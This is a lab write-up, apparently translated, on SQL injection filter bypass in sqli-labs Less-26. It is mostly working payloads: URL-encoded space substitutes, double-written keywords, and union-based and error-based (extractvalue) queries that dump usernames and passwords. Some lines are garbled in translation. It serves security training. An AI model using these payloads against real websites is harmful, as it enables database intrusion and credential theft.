Bypass means
1. Use + sign instead of space
2. Use URL encoding instead of spaces
Spaces ------------------%20
TAB 09 horizontal TAB --------%09
LF OA newline ----------------%0A
FF 0C new page ----------------%0C
CR 0D carriage return ----------%0B
-OA-(MySQL only)---------------%A0
#Case demonstration (URL encoding bypass)
sqli-labs-master/Less-26/
view source code
Made a blacklist filter, it can be seen from the code that the filter is very strict
1. Determine whether there is an injection point
First we give a parameter in the url
The page echo is normal
Randomly throw a symbol to report a page error
''1'' LIMIT 0,1' at line 1
'1'' LIMIT 0,1
Single quotes are what we typed
Determine the closing method'single quotation marks
url:?id=1' and 1=1 #
Judging from the situation echoed to us by the page, the spaces, and and # signs we entered have been filtered out
Originally we entered 1'and 1=1#
until the data becomes
1'1=1
Bypass ideas:
Replace the space with the encoding of the url:%A0
And we use double writing to bypass: anandd
We replace the annotations with manual closing: use'closed
The original statement of the url is not used:
?id=1' anandd '1'='1
url bypass statement:
?id=1'%A0anandd%A0'1'='1
normal page
As can be seen from the blue part, the space statement we entered in the url was brought in
The original statement of the url is not used:
?id=1' anandd '1'='2
url bypass statement:
?id=1'%A0anandd%A0'1'='2
There is an injection point on the page error
2. Determine the number of fields
For the level of sqli-labs-master/Less-26, group by is still used to continuously input how long the field is and it is still echoed normally
We still use union select 1,2,3,4... to query fields in this way
url:?id=1'%A0union%A0select%A01,2%A0anandd%A0'1'='1
page error
url:?id=1'%A0union%A0select%A01,2,3%A0anandd%A0'1'='1
When trying to reach 3, the page is normally echoed.
Determine a total of three fields
3. Determine the number of fields displayed
url: ?id=-1'%A0union%A0select%A01,2,3%A0anandd%A0'1'='1
From the field displayed in the blue part, we can see that he filtered the - sign we entered
We turned out to be ?id=-1
After being filtered by him?id=1
Makes us unable to understand the displayed fields
url: ?id=0'%A0union%A0select%A01,2,3%A0anandd%A0'1'='1
Since the - sign is filtered, we write 0
Bring it into the database for execution, and the page will be echoed normally
Determine the fields 1 and 2 displayed on the page
4. Determine the database name
?id=0'%A0union%A0select%A01,(database()),3%A0anandd%A0'1'='1
The page echoes that the database name is not security
5. Get the data table
url:
?id=0'%A0union%A0select%A01,(select%A0group_concat(table_name)
from%A0infoorrmation_schema.tables%A0where%A0table_schema=database()),
3%A0anandd%A0'1'='1
Make sure the data table is
emails,referers,uagents,users
6. Get all the fields of the users data table
url:
?id=0'%A0union%A0select%A01,(select%A0group_concat(column_name)
from%A0infoorrmation_schema.columns%A0where%A0table_schema=database()%A0ANandD%A0table_name='users'),
3%A0anandd%A0'1'='1
field is
id,username,password
7. Drag library
url:
?id=0'%A0union%A0select%A01,(select%A0group_concat(username,'^^',passwoorrd)from%A0security.users),3%A0ANANDD'1'='1
In some scenarios, spaces are still filtered very strictly and there is no way for us to suddenly, we can use error injection to bypass without writing spaces
#Case demonstration (error injection bypass)
sqli-labs-master/Less-26/
get database
?id=0'||extractvlue('~',concat(database()))||'1'='1
analyze
Write a non-existent id and use or to judge, return when the following conditions are met, and finally use ||'1'='1 to close
||'1'='1=or '1'='1 just for closure! ! ! !
The current database is security
Get the data table name
?id=0'||extractvalue(1,concat('~',(select(group_concat(table_name))
from(infoorrmation_schema.tables)where(table_schema=database()))))||'1'='1Note that spaces cannot be used here, and spaces must be replaced with parentheses
'~emails,referers,uagents,users'
for the data table
Get the field information of the users data table
?id=0'||extractvalue(1,concat('~',(select(group_concat(column_name))
from(infoorrmation_schema.columns)where(table_schema=database())
anandd(table_name='users'))))||'1'='1
id,username,password'
three fields
Tow library
?id=0'||extractvalue(1,concat('~',
(substr((select(group_concat(username,':',passwoorrd))from(security.users)),1,30))))||'1'='1
Error injection reference